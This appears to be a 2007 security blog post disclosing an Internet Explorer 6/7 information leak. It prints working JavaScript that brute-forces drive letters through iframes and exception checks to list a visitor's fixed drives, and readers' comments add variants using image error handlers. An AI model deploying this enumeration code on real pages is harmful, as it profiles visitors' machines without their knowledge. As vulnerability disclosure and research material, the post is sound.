Thursday, July 05, 2007

IE - Guessing The Names Of The Fixed Drives On Your Computer

DEMO

While doing experiments with IE I observed another weird behavior. When I created an anchor tag with href="a:crap" like this, in the progress bar at the bottom IE showed "file:///a:crap". Now this is interesting. How could IE even try to guess the protocol unnecessarily?
I went ahead with a new experiment: created iframes with src = a:crap. This time a 'page could not be displayed' error message.

Accidentally, I tried c:crap, and this time I saw a blank frame. Now I realized that something was special about c:

An onerror handler did not tell me whether frame was blank or an error page. So next thing was to try to read the content of the window. On reading the error page frame, I got an exception. But on c: frame which was blank, no exception was observed.

Then after brute-forcing the first 26 alphabets it was observed that only few drive names are passing the test. The floppy drives and CD drives also threw exceptions. And then enumerating all drive letters was simple.


Here is the source:




<html>
<head>
<title>Determining Fixed Hard Drives On Your Computer</title>
<style type="text/css">iframe{width: "30";height: "20";}</style>
<script>
var cnt = 0, result='';
var drives = [];
for (var j=0;j<26;j++)
{
drives[j] = String.fromCharCode(j+97);
}
function loaded(f)
{
cnt++;
if(cnt == 26)
{
allFramesLoaded();
alert('You have the following Fixed Drives : \n' + result.toUpperCase());
}
}
function allFramesLoaded()
{
for (var i=0; i<26; i++)
{
try{
var k=window.frames[i].document;
result = result + drives[i] + ",";
}
catch(e)
{
}
}
}
function addIFrames()
{
if(document.location.href.indexOf('test=true')<0)
return;
for(var j=0; j<26; j++)
{
var f = document.createElement("iframe");
f.attachEvent('onload', loaded);
f.src = drives[j] + ':' + 'crap';
document.body.appendChild(f);
}
}
</script>
</head>
<body onload='addIFrames()'></body>
</html>



(Demo hosted by Mario)

Tested on IE 6/7

3 comments:

kuza55 said...

Nice find Kishor, :)

Its not really clear from your post, but this technique also finds CD/Floppy drives when there are disks in them - I just thought I'd mention that...

Kishor said...

Thanks a lot. I never thought about that case. Thanks you pointed that out. It worked!

Mohclips said...

You can do the same with images and check the onerror handler which only fires when the drive doesnt exist. onload never fires.